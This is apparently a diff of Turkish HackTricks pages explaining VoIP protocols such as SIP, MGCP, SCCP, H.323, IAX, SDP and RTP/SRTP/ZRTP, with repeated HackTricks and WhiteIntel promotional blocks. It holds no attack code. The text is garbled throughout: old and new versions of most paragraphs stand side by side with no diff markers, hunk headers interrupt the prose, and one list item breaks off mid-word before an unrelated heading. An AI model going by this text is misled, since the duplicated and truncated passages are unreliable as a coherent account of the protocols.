### [Kaba Kuvvet](../generic-methodologies-and-resources/brute-force.md#irc)
### Shodan
* `hostname'nizi araştırma`
* `ana bilgisayar adınızı arıyor`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR göndererek paylaşın.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da takip edin 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,23 +2,37 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklam vermek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u takip edin.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek destek olun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Sinyal Protokolleri
### SIP (Session Initiation Protocol)
Bu, endüstri standardıdır, daha fazla bilgi için kontrol edin:
Bu endüstri standardıdır, daha fazla bilgi için kontrol edin:
{% content-ref url="sip-session-initiation-protocol.md" %}
[sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
@ -26,65 +40,93 @@ Bu, endüstri standardıdır, daha fazla bilgi için kontrol edin:
### MGCP (Media Gateway Control Protocol)
MGCP (Media Gateway Control Protocol), RFC 3435'te belirtilen bir **sinyal** ve **arama kontrol protokolüdür**. Merkezi bir mimaride çalışır ve üç ana bileşenden oluşur:
MGCP (Media Gateway Control Protocol), RFC 3435'te belirtilen bir **sinyal** ve **arama** **kontrol protokolü**dür. Üç ana bileşenden oluşan merkezi bir mimaride çalışır:
1. **Çağrı Yönlendirici veya Medya Ağ Geçidi Denetleyicisi (MGC)**: MGCP mimarisindeki ana ağ geçidi, **medya ağ geçitlerini yönetmek ve kontrol etmekten sorumludur**. Çağrı kurulumu, değiştirme ve sonlandırma işlemlerini yönetir. MGC, MGCP protokolünü kullanarak medya ağ geçitleriyle iletişim kurar.
2. **Medya Ağ Geçitleri (MG) veya Köle Ağ Geçitleri**: Bu cihazlar, geleneksel devre anahtarlı telefonculuk ve paket anahtarlı IP ağları gibi farklı ağlar arasında dijital medya akışlarını dönüştürür. MGC tarafından yönetilir ve ondan alınan komutları uygular. Medya ağ geçitleri, transkodlama, paketleme ve yankı iptali gibi işlevleri içerebilir.
3. **Sinyal Ağ Geçitleri (SG)**: Bu ağ geçitleri, farklı ağlar arasında sinyal iletişimini dönüştürmekten sorumludur ve geleneksel telefon sistemleri (örneğin, SS7) ile IP tabanlı ağlar (örneğin, SIP veya H.323) arasında sorunsuz iletişimi sağlar. Sinyal ağ geçitleri, uyumluluk ve çağrı kontrol bilgilerinin farklı ağlar arasında doğru iletilmesini sağlamak için önemlidir.
1. **Çağrı Yönlendirici veya Medya Ağ Gezgini Denetleyicisi (MGC)**: MGCP mimarisindeki ana ağ geçidi, medya ağ geçitlerini **yönetme ve kontrol etme**den sorumludur. Çağrı kurulumu, değişiklik ve sonlandırma işlemlerini yönetir. MGC, medya ağ geçitleriyle MGCP protokolünü kullanarak iletişim kurar.
2. **Medya Ağ Geçitleri (MGs) veya Köle Ağ Geçitleri**: Bu cihazlar, farklı ağlar arasında dijital medya akışlarını dönüştürür, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları gibi. MGC tarafından yönetilir ve ondan aldığı komutları uygular. Medya ağ geçitleri, transkodlama, paketleme ve yankı iptali gibi işlevleri içerebilir.
3. **Sinyal Ağ Geçitleri (SG'ler)**: Bu ağ geçitleri, farklı ağlar arasında sinyal mesajlarını dönüştürmekten sorumludur, geleneksel telefonculuk sistemleri (örneğin, SS7) ile IP tabanlı ağlar (örneğin, SIP veya H.323) arasında sorunsuz iletişimi sağlar. Sinyal ağ geçitleri, farklı ağlar arasında çağrı kontrol bilgilerinin doğru iletilmesini sağlamak için önemlidir.
Özetlemek gerekirse, MGCP, çağrı kontrol mantığını çağrı yönlendiricide merkezileştirir, bu da medya ve sinyal ağ geçitlerinin yönetimini basitleştirir ve telekomünikasyon ağlarında daha iyi ölçeklenebilirlik, güvenilirlik ve verimlilik sağlar.
Özetle, MGCP, çağrı kontrol mantığını çağrı yönlendiricisinde merkezileştirir, bu da medya ve sinyal ağ geçitlerinin yönetimini basitleştirir ve telekomünikasyon ağlarında daha iyi ölçeklenebilirlik, güvenilirlik ve verimlilik sağlar.
### SCCP (Skinny Client Control Protocol)
Skinny Client Control Protocol (SCCP), Cisco Systems'a ait bir **özel sinyal ve çağrı kontrol protokolüdür**. Öncelikle Cisco Unified Communications Manager (eski adıyla CallManager) ile Cisco IP telefonları veya diğer Cisco ses ve video uç noktaları arasındaki iletişim için **kullanılır**.
Skinny Client Control Protocol (SCCP), Cisco Systems'e ait **özel bir sinyal ve çağrı kontrol protokolü**dür. Öncelikle **Cisco Unified Communications Manager** (eskiden CallManager olarak bilinir) ile Cisco IP telefonları veya diğer Cisco ses ve video uç noktaları arasındaki iletişimde **kullanılır**.
SCCP, çağrı kontrol sunucusu ile uç nokta cihazları arasındaki iletişimi basitleştiren hafif bir protokoldür. "Skinny" olarak adlandırılmasının nedeni, minimal tasarımı ve diğer VoIP protokolleri (örneğin H.323 veya SIP) ile karşılaştırıldığında daha az bant genişliği gereksinimleriyle dikkat çekmesidir.
SCCP, çağrı kontrol sunucusu ile uç nokta cihazlar arasındaki iletişimi basitleştiren hafif bir protokoldür. "Skinny" olarak adlandırılmasının nedeni, minimal tasarımı ve diğer VoIP protokolleri olan H.323 veya SIP gibi protokollere kıyasla daha az bant genişliği gereksinimleridir.
SCCP tabanlı bir sistemin temel bileşenleri şunlardır:
SCCP tabanlı bir sistemin başlıca bileşenleri şunlardır:
1. **Çağrı Kontrol Sunucusu**: Genellikle Cisco Unified Communications Manager olan bu sunucu, çağrı kurulumu, değiştirme ve sonlandırma işlemlerini yönetir, ayrıca çağrı yönlendirme, çağrı aktarma ve çağrı tutma gibi diğer telefon özelliklerini de içerir.
2. **SCCP Uç Noktaları**: Bunlar, SCCP'yi kullanarak çağrı kontrol sunucusuyla iletişim kuran IP telefonları, video konferans birimleri veya diğer Cisco ses ve video uç noktaları gibi cihazlardır. Uç noktalar, sunucuya kaydolur, sinyal iletilerini gönderir ve alır ve çağrı işleme için çağrı kontrol sunucusu tarafından verilen talimatları takip eder.
3. **Ağ Geçitleri**: Ses ağ geçitleri veya medya ağ geçitleri gibi bu cihazlar, geleneksel devre anahtarlı telefonculuk ve paket anahtarlı IP ağları gibi farklı ağlar arasında medya akışlarını dönüştürmekten sorumludur. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilir.
1. **Çağrı Kontrol Sunucusu**: Genellikle Cisco Unified Communications Manager olan bu sunucu, çağrı kurulumu, değişiklik ve sonlandırma işlemlerini yönetir, ayrıca çağrı yönlendirme, çağrı aktarma ve çağrı tutma gibi diğer telefon özelliklerini de sağlar.
2. **SCCP Uç Noktaları**: Bunlar, çağrı kontrol sunucusu ile iletişim kurmak için SCCP'yi kullanan IP telefonları, video konferans birimleri veya diğer Cisco ses ve video uç noktaları gibi cihazlardır. Sunucuya kaydolurlar, sinyal mesajları gönderir ve alırlar ve çağrı yönlendirme için çağrı kontrol sunucusu tarafından verilen talimatları takip ederler.
3. **Ağ Geçitleri**: Bu cihazlar, ses akışlarını farklı ağlar arasında dönüştürmekten sorumludur, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları arasında. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilirler.
SCCP, Cisco çağrı kontrol sunucuları ile uç nokta cihazları arasında basit ve verimli bir iletişim yöntemi sunar. Bununla birlikte, SCCP'nin **özel bir protokol** olması, non-Cisco sistemlerle uyumluluğu sınırlayabilir. Bu durumlarda, SIP gibi diğer standart VoIP protokolleri daha uygun olabilir.
SCCP, Cisco çağrı kontrol sunucuları ile uç nokta cihazlar arasında basit ve verimli bir iletişim yöntemi sunar. Ancak, **SCCP özel bir protokoldür**, bu da onun Cisco dışı sistemlerle uyumluluğunu sınırlayabilir. Bu tür durumlarda, SIP gibi diğer standart VoIP protokolleri daha uygun olabilir.
### H.323
H.323, IP tabanlı ağlar gibi paket anahtarlı ağlar üzerinde ses, video ve veri konferansı da dahil olmak üzere multimedya iletişimi için bir **protokol paketi**dir. Uluslararası Telekomünikasyon Birliği (ITU-T) tarafından geliştirilmiştir ve multimedya iletişim oturumlarını yönetmek için kapsamlı bir çerçeve sunar.
H.323, ses, video ve veri konferansları da dahil olmak üzere çoklu ortam iletişimi için bir dizi protokoldür, IP tabanlı ağlar gibi paket anahtarlamalı ağlar üzerinden ses, video ve veri konferansları sağlar. Uluslararası Telekomünikasyon Birliği (ITU-T) tarafından geliştirilmiş olup çoklu ortam iletişim oturumlarını yönetmek için kapsamlı bir çerçeve sunar.
H.323 paketinin bazı temel bileşenleri şunları içerir:
1. **Uç Noktalar**: IP telefonlar, video konferans sistemleri veya yazılım uygulamaları gibi H.323'ü destekleyen uç nokta cihazlarıdır ve multimedya iletişim oturumlarına katılabilirler.
2. **Ağ Geçitleri**: Bu cihazlar, geleneksel devre anahtarlı telefonculuk ve paket anahtarlı IP ağları gibi farklı ağlar arasında medya akışlarını dönüştürür ve H.323 ile diğer iletişim sistemleri arasında uyumluluk sağlar. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilir.
3. **Çağrı Yönlendiriciler**: H.323 ağında çağrı kontrolü ve yönetim hizmetleri sağlayan bu isteğe bağlı bileşenlerdir. Adres çevirme, bant genişliği yönetimi ve kabul kontrolü gibi işlevleri gerçekleştirir ve ağ kaynaklarını yönetmeye ve optimize etmeye yardımcı olur.
4. **Çok N
## İletim ve Taşıma Protokolleri
1. **Uç Noktalar**: Bu, H.323'ü destekleyen IP telefonlar, video konferans sistemleri veya yazılım uygulamaları gibi uç nokta cihazlarıdır ve çoklu ortam iletişim oturumlarına katılabilirler.
2. **Ağ Geçitleri**: Bu cihazlar, farklı ağlar arasında medya akışlarını dönüştürür, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları arasında etkileşim sağlar. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilirler.
3. **Geçit Kontrolcüleri**: Bu, bir H.323 ağında çağrı kontrolü ve yönetim hizmetleri sağlayan isteğe bağlı bileşenlerdir. Adres çevirme, bant genişliği yönetimi ve kabul kontrolü gibi işlevleri gerçekleştirir, ağ kaynaklarını yönetmeye ve optimize etmeye yardımcı olur.
4. **Çok Noktalı Kontrol Birimleri (MCU'lar)**: Bu cihazlar, çok noktalı konferansları yöneterek birden fazla uç noktadan gelen medya akışlarını yönetir ve karıştırır. MCU'lar, video düzen kontrolü, sesle etkinleştirilmiş anahtarlamalar ve sürekli varlık gibi özellikleri destekleyerek, çok sayıda katılımcıyla büyük ölçekli konferanslar düzenlemeyi mümkün kılar.
H.323, bir dizi ses ve video kodekini destekler ve çağrı yönlendirme, çağrı aktarma, çağrı tutma ve çağrı bekleme gibi diğer ek hizmetleri de içerir. VoIP'in erken günlerinde geniş bir şekilde benimsenmesine rağmen, H.323, daha modern ve esnek protokoller olan **Session Initiation Protocol (SIP)** tarafından yavaş yavaş değiştirilmiştir, bu da daha iyi uyumluluk ve daha kolay uygulama sağlar. Bununla birlikte, H.323, birçok eski sistemde kullanılmaya devam etmekte ve çeşitli ekipman satıcıları tarafından desteklenmektedir.
### IAX (Inter Asterisk eXchange)
IAX (Inter-Asterisk eXchange), Asterisk PBX (Private Branch Exchange) sunucuları ile diğer VoIP cihazları arasındaki iletişimde **kullanılan bir sinyal ve çağrı kontrol protokolü**dür. Asterisk açık kaynaklı PBX yazılımının yaratıcısı Mark Spencer tarafından, SIP ve H.323 gibi diğer VoIP protokollerine alternatif olarak geliştirilmiştir.
IAX, **basitlik, verimlilik ve uygulanabilirlik kolaylığı** ile tanınır. IAX'in bazı temel özellikleri şunlardır:
1. **Tek UDP Portu**: IAX, hem sinyal hem de medya trafiği için tek bir UDP portu (4569) kullanır, bu da güvenlik duvarı ve NAT geçişi basitleştirir ve çeşitli ağ ortamlarında dağıtımı kolaylaştırır.
2. **İkili Protokol**: SIP gibi metin tabanlı protokollerin aksine, IAX ikili bir protokoldür, bu da bant genişliği tüketimini azaltır ve sinyal ve medya verilerini iletmek için daha verimli hale getirir.
3. **Trunking**: IAX, birden fazla çağrının tek bir ağ bağlantısına birleştirilmesine izin veren trunking'i destekler, bu da aşırı başlık maliyetini azaltır ve bant genişliği kullanımını iyileştirir.
4. **Doğal Şifreleme**: IAX, RSA gibi yöntemlerle anahtar değişimi ve AES gibi medya şifrelemesi için kullanılan şifrelemeyi destekler, uç noktalar arasında güvenli iletişim sağlar.
5. **Eşten Eşe İletişim**: IAX, merkezi bir sunucuya gerek olmadan uç noktalar arasında doğrudan iletişim için kullanılabilir, bu da çağrı yönlendirmeyi daha basit ve verimli hale getirir.
Avantajlarına rağmen, IAX'in Asterisk ekosistemi üzerinde odaklanması ve daha yaygın olarak benimsenmiş protokollere kıyasla daha az yaygın kullanımı gibi bazı sınırlamaları vardır. Sonuç olarak, IAX, Asterisk ortamında çalışanlar için VoIP iletişimi için güçlü ve verimli bir çözüm sunabilir.
## Aktarım ve Taşıma Protokolleri
### SDP (Session Description Protocol)
SDP (Session Description Protocol), IP ağları üzerinde ses, video veya veri konferansı gibi multimedya oturumlarının özelliklerini tanımlamak için kullanılan **metin tabanlı bir formattır**. İnternet Mühendislik Görev Gücü (IETF) tarafından geliştirilmiş olup **RFC 4566**'da tanımlanmıştır. SDP, gerçek medya iletimini veya oturum kurulumunu yönetmez, ancak diğer sinyal protokolleriyle birlikte, örneğin **SIP (Session Initiation Protocol)** ile birlikte kullanılarak medya akışları ve özellikleri hakkında bilgi alışverişi ve müzakere için kullanılır.
SDP (Session Description Protocol), ses, video veya veri konferansları gibi multimedya oturumlarının özelliklerini tanımlamak için kullanılan **metin tabanlı bir formattır** ve IP ağları üzerinden iletilir. **Internet Engineering Task Force (IETF)** tarafından geliştirilmiş olup **RFC 4566**'da tanımlanmıştır. SDP, gerçek medya iletimini veya oturum kurulumunu ele almaz ancak diğer sinyal protokolleriyle, örneğin **SIP (Session Initiation Protocol)** ile birlikte kullanılarak medya akışları ve özellikleri hakkında bilgi alışverişi yapmak için kullanılır.
SDP'nin bazı temel unsurları şunlardır:
1. **Oturum Bilgisi**: SDP, oturum adı, oturum açıklaması, başlangıç zamanı ve bitiş zamanı gibi bir multimedya oturumunun ayrıntılarını tanımlar.
2. **Medya Akışları**: SDP, medya türü (ses, video veya metin), taşıma protokolü (örneğin RTP veya SRTP) ve medya formatı (örneğin codec bilgisi) gibi medya akışlarının özelliklerini tanımlar.
3. **Bağlantı Bilgisi**: SDP, medyanın gönderileceği veya alınacağı ağ adresi (IP adresi) ve port numarası hakkında bilgi sağlar.
4. **Öznitelikler**: SDP, oturum veya medya akışı hakkında ek, isteğe bağlı bilgiler sağlamak için öznitelik kullanımını destekler. Öznitelikler, şifreleme anahtarları, bant genişliği gereksinimleri veya medya kontrol mekanizmaları gibi çeşitli özellikleri belirtmek için kullanılabilir.
1. **Oturum Bilgileri**: SDP, oturum adı, oturum açıklaması, başlangıç zamanı ve bitiş zamanı gibi multimedya oturumlarının ayrıntılarını tanımlar.
2. **Medya Akışları**: SDP, medya türü (ses, video veya metin), taşıma protokolü (örneğin, RTP veya SRTP) ve medya formatı (örneğin, codec bilgisi) gibi medya akışlarının özelliklerini tanımlar.
3. **Bağlantı Bilgileri**: SDP, medyanın gönderilip alınması gereken ağ adresi (IP adresi) ve port numarası hakkında bilgi sağlar.
4. **Öznitelikler**: SDP, oturum veya medya akışı hakkında ek, isteğe bağlı bilgiler sağlamak için öznitelikleri destekler. Öznitelikler, şifreleme anahtarları, bant genişliği gereksinimleri veya medya kontrol mekanizmaları gibi çeşitli özellikleri belirtmek için kullanılabilir.
SDP genellikle aşağıdaki süreçte kullanılır:
1. Başlatan taraf, önerilen multimedya oturumunun SDP açıklamasını, medya akışlarının ayrıntıları ve özellikleriyle birlikte oluşturur.
2. SDP açıklaması genellikle SIP veya RTSP gibi bir sinyal protokolü mesajının içine gönderilir ve alıcı tarafa iletilir.
1. Başlatan taraf, önerilen multimedya oturumunun SDP açıklamasını oluşturur; medya akışlarının ayrıntılarını ve özelliklerini içerir.
2. SDP açıklaması, genellikle SIP veya RTSP gibi bir sinyal protokolü mesajının içine gömülü olarak alıcı tarafa gönderilir.
3. Alıcı taraf, SDP açıklamasını işler ve yeteneklerine bağlı olarak önerilen oturumu kabul edebilir, reddedebilir veya değiştirebilir.
4. Son SDP açıklaması, müzakere sürecini tamamlayan sinyal protokolü mesajının bir parçası olarak başlatan tarafa geri gönderilir.
4. Son SDP açıklaması, müzakere sürecini tamamlayan bir sinyal protokolü mesajının bir parçası olarak başlatan tarafa geri gönderilir.
SDP'nin basitliği ve esnekliği, IP ağları üzerinde gerçek zamanlı multimedya oturumlarının tanımlanmasında yaygın olarak kabul edilen bir standart olmasını sağlar ve iletişim sistemlerinde gerçek zamanlı multimedya oturumlarının kurulması ve yönetilmesinde önemli bir rol oynar.
SDP'nin basitliği ve esnekliği, çeşitli iletişim sistemlerinde multimedya oturumlarını tanımlamak için yaygın olarak benimsenen bir standart olmasını sağlar ve IP ağları üzerinden gerçek zamanlı multimedya oturumlarının kurulmasında ve yönetilmesinde kritik bir rol oynar.
### RTP / RTCP / SRTP / ZRTP
1. **RTP (Real-time Transport Protocol)**: RTP, IP ağları üzerinde ses ve video verileri veya diğer gerçek zamanlı medyanın iletimi için tasarlanmış bir ağ protokolüdür. IETF tarafından geliştirilmiş olup **RFC 3550**'de tanımlanmıştır. RTP, genellikle SIP ve H.323 gibi sinyal protokolleriyle birlikte kullanılarak multimedya iletişimini mümkün kılar. RTP, medya akışlarının **senkronizasyonu**, **sıralama** ve **zaman damgalama** mekanizmaları sağlayarak, akıcı ve zamanında medya oynatımını sağlamaya yardımcı olur.
2. **RTCP (Real-time Transport Control Protocol)**: RTCP, RTP'nin bir eşlik eden protokolü olup, medya akışlarının kalitesini izlemek ve iletim hakkında geri bildirim sağlamak için kullanılır. RTP ile aynı **RFC 3550**'de tanımlanan RTCP, bir RTP oturumundaki katılımcılar arasında **periyodik olarak kontrol paketleri alışverişi yapar**. Paket kaybı, jitter ve gidiş-dönüş süresi gibi bilgileri paylaşarak, ağ koşullarını teşhis etmeye ve buna uyum sağlamaya yardımcı olur, genel medya kalitesini iyileştirir.
3. **SRTP (Secure Real-time Transport Protocol)**: SRTP, RTP'nin bir uzantısı olup, hassas ses ve video verilerinin güvenli iletimini sağlamak için **şifreleme**, **mesaj doğrulama** ve **yeniden oynatma koruması** sağlar. **RFC 3711**'de tanımlanan SRTP, şifreleme için AES gibi kriptografik algoritmaları ve mesaj doğrulama için HMAC-SHA1'i kullanır. SRTP genellikle SIP üzerinden TLS ile güvenli sinyal protokolleriyle birlikte kullanılarak, multimedya iletişiminde uçtan uca güvenlik sağlar.
4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP, RTP medya akışları için **uçtan uca şifreleme** sağlayan bir kriptografik anahtar anlaşma protokolüdür. PGP'nin yaratıcısı Phil Zimmermann tarafından geliştirilen ZRTP, **RFC 6189**'da tanımlanmıştır. Anahtar değişimi için sinyal protokollerine dayanan SRTP'nin aksine, ZRTP, sinyal protokolünden bağımsız olarak çalışacak şekilde tasarlanmıştır. İletişim kuran taraflar arasında önceden güven veya bir genel anahtar altyapısı (PKI) gerektirmeksizin, Diffie-Hellman anahtar değişimi kullanarak ortak bir sır oluşturur. ZRTP, man-in-the-middle saldırılarına karşı koruma sağlamak için **Kısa Kimlik Doğrulama Dizeleri (SAS)** gibi özellikler de içerir.
1. **RTP (Real-time Transport Protocol)**: RTP, ses ve video verileri veya diğer gerçek zamanlı medyaların IP ağları üzerinden iletilmesi için tasarlanmış bir ağ protokolüdür. **IETF** tarafından geliştirilmiş ve **RFC 3550**'de tanımlanmıştır. RTP genellikle SIP ve H.323 gibi sinyal protokolleriyle birlikte kullanılarak multimedya iletişimini sağlar. RTP, medya akışlarının **senkronizasyonu**, **sıralaması** ve **zaman damgası** için mekanizmalar sağlar, böylece akıcı ve zamanında medya oynatımını sağlar.
2. **RTCP (Real-time Transport Control Protocol)**: RTCP, RTP'nin yanında kullanılan, hizmet kalitesini (QoS) izlemek ve medya akışlarının iletimi hakkında geri bildirim sağlamak için kullanılan bir protokoldür. RTP ile aynı **RFC 3550**'de tanımlanmış olup RTCP, bir RTP oturumundaki katılımcılar arasında **periyodik olarak kontrol paketleri alışverişi yapar**. Paket kaybı, jitter ve gecikme gibi bilgileri paylaşarak ağ koşullarını teşhis etmeye ve buna uyum sağlamaya yardımcı olur, genel medya kalitesini artırır.
3. **SRTP (Secure Real-time Transport Protocol)**: SRTP, medya akışları için **şifreleme**, **mesaj doğrulama** ve **tekrar koruması** sağlayan RTP'nin bir uzantısıdır ve hassas ses ve video verilerinin güvenli iletimini sağlar. **RFC 3711**'de tanımlanmış olup SRTP, şifreleme için AES gibi kriptografik algoritmalar ve mesaj doğrulama için HMAC-SHA1 kullanır. SRTP genellikle, multimedya iletişiminde uçtan uca güvenlik sağlamak için SIP üzerinden TLS ile birlikte kullanılır.
4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP, RTP medya akışları için **uçtan uca şifreleme** sağlayan bir kriptografik anahtar anlaşma protokolüdür. PGP'nin yaratıcısı Phil Zimmermann tarafından geliştirilmiş olup **RFC 6189**'da tanımlanmıştır. SRTP'nin aksine, ZRTP, anahtar değişimi için sinyal protokollerine güvenmek yerine bağımsız olarak çalışacak şekilde tasarlanmıştır. İletişim kuran taraflar arasında bir paylaşılan sır oluşturmak için **Diffie-Hellman anahtar değişimi** kullanır ve önceden güven veya bir genel anahtar altyapısı (PKI) gerektirmez. ZRTP, **Man-in-the-Middle** saldırılarına karşı koruma sağlamak için **Kısa Kimlik Doğrulama Dizileri (SAS)** gibi özellikler de içerir.
Bu protokoller, IP ağları üzerinde **gerçek zamanlı multimedya iletişiminin iletilmesi ve güvenliğinin sağlanmasında** önemli roller oynar. RTP ve RTCP gerçek medya iletimini ve kalite izlemeyi yönetirken, SRTP ve ZRTP, iletilen medyanın dinlenme, değiştirme ve yeniden oynatma saldırılarına karşı korunmasını sağlar.
Bu protokoller, IP ağları üzerinden **gerçek zamanlı multimedya iletişiminin iletilmesi ve güvenliğinin sağlanmasında** temel roller oynar. RTP ve RTCP gerçek medya iletimini ve kalite izlemeyi ele alırken, SRTP ve ZRTP, iletilen medyanın dinlenmeye, değiştirilmeye ve tekrar oynatılmaya karşı korunduğundan emin olur.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}

View file

@ -6,19 +6,33 @@
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
